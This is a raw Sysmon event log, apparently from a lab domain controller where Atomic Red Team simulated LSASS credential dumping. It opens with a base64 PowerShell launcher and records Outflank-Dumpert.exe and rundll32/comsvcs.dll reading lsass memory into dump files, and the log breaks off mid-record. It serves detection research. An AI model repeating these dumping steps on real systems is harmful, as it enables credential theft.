WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== 10341000x80000000000000005580Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.190{D28789B6-7CDE-5FA1-2401-000000008801}40443384C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005579Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.174{D28789B6-7CDF-5FA1-2501-000000008801}33524448C:\Windows\System32\rundll32.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\windows\System32\comsvcs.dll+39d24|C:\Windows\System32\rundll32.exe+3b0c|C:\Windows\System32\rundll32.exe+6017|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005578Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.159{D28789B6-7CDF-5FA1-2501-000000008801}3352C:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\lsass-comsvcs.dmp2020-11-03 15:53:03.159 10341000x80000000000000005577Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.159{D28789B6-7CDF-5FA1-2501-000000008801}33524448C:\Windows\System32\rundll32.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\windows\System32\comsvcs.dll+39c0f|C:\Windows\System32\rundll32.exe+3b0c|C:\Windows\System32\rundll32.exe+6017|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005576Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.143{D28789B6-7CDF-5FA1-2701-000000008801}45402764C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+1b11|C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+1fa4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005575Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.143{D28789B6-7CDF-5FA1-2701-000000008801}4540C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exeC:\Windows\Temp\dumpert.dmp2020-11-03 15:53:03.143 10341000x80000000000000005574Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.143{D28789B6-7CDF-5FA1-2701-000000008801}45402764C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+1d32|C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+19b2|C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+1fa4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005573Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CDF-5FA1-2701-000000008801}4540C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005572Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005571Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005570Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CDF-5FA1-2701-000000008801}4540C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005569Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005568Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005567Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005566Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005565Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005564Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005563Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005562Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7CDF-5FA1-2601-000000008801}23922712C:\Windows\system32\cmd.exe{D28789B6-7CDF-5FA1-2701-000000008801}4540C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005561Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.133{D28789B6-7CDF-5FA1-2701-000000008801}4540C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe-----C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=69C05093EB542E1C29A556A29E74E99A,SHA256=F323569E5D64A3AA60045BD06C2421E729D1C0D79028ABA9E227D9EEAEEC62E5,IMPHASH=09D278F9DE118EF09163C6140255C690{D28789B6-7CDF-5FA1-2601-000000008801}2392C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe" 10341000x80000000000000005560Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CDF-5FA1-2601-000000008801}2392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005559Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CDF-5FA1-2601-000000008801}2392C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAC74C3) 10341000x80000000000000005558Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005557Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005556Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005555Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005554Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005553Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005552Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 